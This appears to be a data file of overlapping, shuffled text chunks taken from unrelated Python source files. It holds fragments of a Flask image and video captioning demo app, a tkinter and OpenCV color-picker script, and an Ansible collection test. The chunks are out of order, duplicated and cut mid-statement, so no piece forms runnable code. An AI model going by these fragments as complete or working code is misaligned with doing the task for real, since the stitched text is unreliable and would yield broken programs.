"samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF",
"for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render",
"'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] =",
"has an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in",
"> best_score: best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption",
"rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids",
"vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' +",
"filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename +",
"contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\"",
"def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if",
"cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts",
"caption, scene_example_file + '.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file",
"page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images',",
"== 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x not",
"filename, save to file, get ext and determine type file.filename = file.filename.replace(' ',",
"vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes',",
"= 'by_scene' in request.form # Check if filetype is allowed if file and",
"not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption(",
"in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file",
"\"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about",
"= ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge im",
"str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'],",
"bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt =",
"Create scene example if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'):",
"Check if file is uploaded if request.method == 'POST': try: # Grab file,",
"video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption =",
"narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = '' best_score = 0.0",
"scene and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'],",
"import shutil import pandas as pd import skimage.io as io import PIL from",
"+ '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg')",
"samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images",
"# Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize",
"*filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace existing",
"scene example if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): #",
"store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image",
"caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET',",
"[], [], []] VID_SAMPLES_DICT = [[], [], [], []] for i, ix in",
"example if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate",
"name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption']",
"render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html',",
"Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF",
"= narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt",
"in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({",
"filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE'])",
"Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') #",
"classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] )",
"# Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4'",
"}) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt':",
"Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption",
"samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name,",
"return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html',"
] |
[
"test_find_collection(): location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location =",
"None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules():",
"location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not",
"is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules is not None",
"( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location",
"import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert",
"def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules",
"test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location =",
"= find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert",
"assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is",
"find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is",
"assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is",
"location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not",
"ansible_events.collection import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\")",
"not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def",
"test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules =",
"find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules",
"find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location",
"is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None",
"= find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert",
") def test_find_collection(): location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda():",
"not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def",
"None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source():",
"def test_find_collection(): location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location",
"is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None",
"assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules is",
"split_collection_name, find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is not",
"location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\"))",
"location = find_collection(\"community.general\") assert location is not None def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\")",
"location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert rules is not",
"location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\"))",
"<gh_stars>0 from ansible_events.collection import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location",
"def test_find_collection_eda(): location = find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location",
"load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is not None def",
"= find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location is not None def test_load_rules(): rules = load_rules(*split_collection_name(\"benthomasson.eda.hello_events\")) assert",
"from ansible_events.collection import ( find_collection, split_collection_name, find_source, load_rules, ) def test_find_collection(): location =",
"find_source, load_rules, ) def test_find_collection(): location = find_collection(\"community.general\") assert location is not None",
"find_collection(\"benthomasson.eda\") assert location is not None def test_find_source(): location = find_source(*split_collection_name(\"benthomasson.eda.range\")) assert location"
] |
[] |
[
"= openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\":",
"from tkinter import * import cv2 import numpy as np import urllib.request import",
"file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn",
"= ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open",
"urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg =",
"== cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos =",
"Detection\",img) if (clicked): #scale text according to image size imageWidth = img.shape[0] imageHeight",
"cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale",
"(max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name and RGB",
"urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image",
"imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1)",
"= False r = g = b = hexcode = xpos = ypos",
"minimum = 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G-",
"btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) #",
"giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function",
"btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3",
"urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp",
"to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate",
"import urllib.request import pandas as pd from tkinter import filedialog from PIL import",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label =",
"image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType )",
"getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click def",
"#resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop()",
"= min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display",
"text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in black colour if(r+g+b>=600):",
"img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn",
"names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to",
"btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2",
"text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key if cv2.waitKey(20) &",
"PIL import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color Detection\")",
"endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn",
"fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display(",
") cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in black",
"size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img,",
"#Reading the image with opencv img = cv2.imread(image_path) #declaring global variables (are used",
"urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260)",
"cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name and",
"int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked):",
"urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image =",
"import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\")",
"cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image size imageWidth =",
"image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint,",
"open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png",
"and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None)",
"csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all",
"= csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn",
"btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4",
"if image_path == \"\": img = urlimg.image else : #Reading the image with",
"image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 =",
"colors and get the most matching color def getColorName(R,G,B): minimum = 10000 for",
"int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"]",
"draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos",
"strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else :",
"Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image",
"#copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth",
"index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from",
"Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text",
"selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized)",
"resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start",
"# open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3",
"cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize",
"urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS)",
"rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name",
"+\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to",
"finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg",
"ypos = y b,g,r = img[y,x] b = int(b) g = int(g) r",
"loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF ==13: break cv2.destroyAllWindows()",
"on) clicked = False r = g = b = hexcode = xpos",
"root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array",
"btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1",
"while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image size imageWidth",
"entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color",
"imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire",
"img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills",
"finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen",
"Color Detection\",img) if (clicked): #scale text according to image size imageWidth = img.shape[0]",
"pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53')",
"mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked",
"open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized =",
"openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1)",
"d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of",
"global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\")))",
"text = getColorName.cname + ' R='+ str(r) + ' G='+ str(g) + '",
"= d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates",
"selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn =",
"root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select",
"selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image",
"Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename =",
"command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image",
"to display( Color name and RGB values ) text = getColorName.cname + '",
"from tkinter import filedialog from PIL import ImageTk,Image import pyperclip as pc root",
"image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg =",
"btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg",
"= y b,g,r = img[y,x] b = int(b) g = int(g) r =",
"cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key if cv2.waitKey(20)",
"def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"]))",
"= getColorName.cname + ' R='+ str(r) + ' G='+ str(g) + ' B='+",
"pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command =",
"will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop",
"abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname =",
"image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path",
"selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2)",
"if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key if",
"= 0 #Reading csv file with pandas and giving names to each column",
"getColorName(r,g,b) #Creating text string to display( Color name and RGB values ) text",
"= csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click def draw_function(event,",
"btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry",
"= cv2.imread(image_path) #declaring global variables (are used later on) clicked = False r",
") text = getColorName.cname + ' R='+ str(r) + ' G='+ str(g) +",
"color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string",
"global variables (are used later on) clicked = False r = g =",
"def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image",
"select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS)",
"used later on) clicked = False r = g = b = hexcode",
"url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() #",
"img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\")",
"clicked=False #Break the loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF",
"x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK:",
"R='+ str(r) + ' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode",
"# open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized",
"ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53')",
"csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click",
"False r = g = b = hexcode = xpos = ypos =",
"files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image selectimg2",
"root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path =",
"xpos = x ypos = y b,g,r = img[y,x] b = int(b) g",
